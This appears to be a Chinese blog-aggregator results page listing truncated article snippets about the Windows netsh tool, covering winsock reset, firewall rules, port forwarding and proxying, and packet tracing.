    什么是Netsh Winsock reset? Netsh winsock reset是一个命令提示程序,用于将winsock目录重置为默认设置或清除状态。如有时候上不了网或者网络出现问题经常用到它,简单地理解就是:重置程序通过操作系统链接网络的...
  • 如何使用"netsh advfirewall firewall"上下文,而不是"netsh firewall"上下文控制Windows Vista 和 Windows Server 2008 中的防火墙行为 适用于:Windows Server 2008 EnterpriseWindows Server 2008 ...
  • netsh配置网络失败

    2019-10-16 14:15:14
    最近在写关于win10系统下修改网络配置的代码,程序中使用了netsh这个命令,代码如下(部分参考自网上的代码,抱歉忘了出处): if(ui->Network_ipnamed->isChecked()){ QString ip = ui->Network_ip_p-...
  • # cmd netsh命令记录 ### windows重置网络 - netsh winsock reest add - 在项目列表上添加一个配置项目。 advfirewall - 更改到 `netsh advfirewall' 上下文。 branchcache - 更改到 `netsh branchcache' 上下文...
  • 命令1 netshhttpaddurlaclurl=...;GX;;;LS)user=domain\user ...netsh 是HTTP的配置工具 Vista 以上 自带, 之前的版本是HTTPCfg,在额外的工具包里 HTTP 是配置 HTTP相关的 add 是添加,也有其他操作 比如 删除 ...
  • 使用netsh来进行端口转发

    千次阅读 2019-04-19 19:21:48
    在历史消息中搜索:使用netsh来进行端口转发 目录 0x00 简介 0x01 2003命令介绍 0x02 2003以后命令介绍(以08为例) 0x03 实际利用案例 0x04 流量转发 正文 0x00 简介 netsh(Network Shell) 是一个windows系统本身...
  • 使用netsh trace抓包

    千次阅读 2020-01-06 15:44:06
    Netsh 在Windows7以后,NetSh工具本身已经成为一个功能非常强大的命令行工具。强烈建议任何在Windows系统上提供支持的人来研究学习其提供的所有选项。在本篇文章中,将着重介绍Netsh Trace的使用 Netsh Trace 在...
  • 渗透测试-地基篇-netsh内网穿透篇(二十) ** 作者:大余 时间:2020-12-13 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望...
  • netsh advfirewall

    千次阅读 2017-11-03 22:13:00
    netsh advfirewall firewall add rule name="My Application" dir=in action=allow program="C:\MyApp\MyApp.exe" enable=yes remoteip=157.60.0.1,172.16.0.0/16,LocalSubnet profile=private netsh ...
  • 文章目录Windows 端口代理配置(Netsh)端口代理简单示例参数说明扩展使用 Windows 端口代理配置(Netsh) 端口代理 端口代理 一词摘自微软官方中文文档,在其他地方可能叫端口转发或者端口映射 它是作用是把对 IPA...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 23,536
精华内容 9,414
关键字:

netsh